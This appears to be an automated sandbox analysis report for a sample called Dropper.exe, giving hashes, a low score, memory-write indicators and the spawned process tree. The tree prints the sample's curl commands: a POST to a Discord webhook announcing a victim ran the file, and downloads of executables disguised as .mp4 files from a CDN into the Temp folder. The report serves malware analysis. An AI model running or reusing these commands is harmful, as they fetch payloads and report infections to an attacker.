Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 08:13
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240419-en
1 signatures
150 seconds
Behavioral task
behavioral2
Sample
Dropper.exe
Resource
win10v2004-20240611-en
28 signatures
150 seconds
General
-
Target
Dropper.exe
-
Size
13KB
-
MD5
b893cd6a15c7c066afed84a3cfbb5367
-
SHA1
8b147ed2063ffea51ebd884d476410541405ef95
-
SHA256
6207d9cf72b8a1a656ebec2a1aac8476cea35ee877895bd788c2e4998aca6920
-
SHA512
e1299e328d33243cb52d11dbff2c04903f54409d0e6b2f855ad7af18c3c34d619482db67800dd1a49bf2c6db816e3f86c52619c2a538b455e800841cc5209733
-
SSDEEP
384:QMEPpIezni333CSlPmbptz6RLZLf+pfolcfAhDBVCs0:ipdm33CSIbD0LHGAhDBws0
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
Dropper.exedescription pid process target process PID 1700 wrote to memory of 1812 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 1812 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 1812 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 1812 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2148 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2148 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2148 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2148 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2404 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2404 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2404 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2404 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2644 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2644 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2644 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2644 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2776 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2776 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2776 1700 Dropper.exe cmd.exe PID 1700 wrote to memory of 2776 1700 Dropper.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe2⤵